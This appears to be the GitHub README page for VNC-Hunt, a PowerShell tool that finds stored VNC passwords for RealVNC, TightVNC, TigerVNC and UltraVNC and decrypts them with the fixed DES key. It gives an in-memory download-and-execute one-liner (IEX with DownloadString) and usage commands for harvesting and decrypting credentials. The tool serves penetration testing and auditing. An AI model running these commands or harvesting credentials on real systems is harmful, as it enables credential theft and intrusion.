Skip to content

PowerShell script that hunts for local VNC encrypted passwords and decrypts them

Notifications You must be signed in to change notification settings

The-Viper-One/VNC-Hunt

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 

Repository files navigation

About

This PowerShell script searches for VNC passwords stored in the registry and configuration files for various VNC implementations, including RealVNC, TightVNC, TigerVNC, and UltraVNC. The script identifies and decrypts these passwords using the DES algorithm with a fixed key. It covers the following VNC implementations:

  • RealVNC: Searches the registry for VNC server proxy credentials.
  • TightVNC: Searches the registry for server passwords, control passwords, and view-only passwords.
  • TigerVNC: Searches the registry for server passwords.
  • UltraVNC: Searches for passwords in configuration files located in specified directories.

Usage

Load into memory

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/VNC-Hunt/main/VNC-Hunt.ps1")

Hunt for VNC credentials

VNC-Hunt

Decrypt supplied encrypted password value

VNC-Decrypt -Password FACBCF50C3BF1C08

image

About

PowerShell script that hunts for local VNC encrypted passwords and decrypts them

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published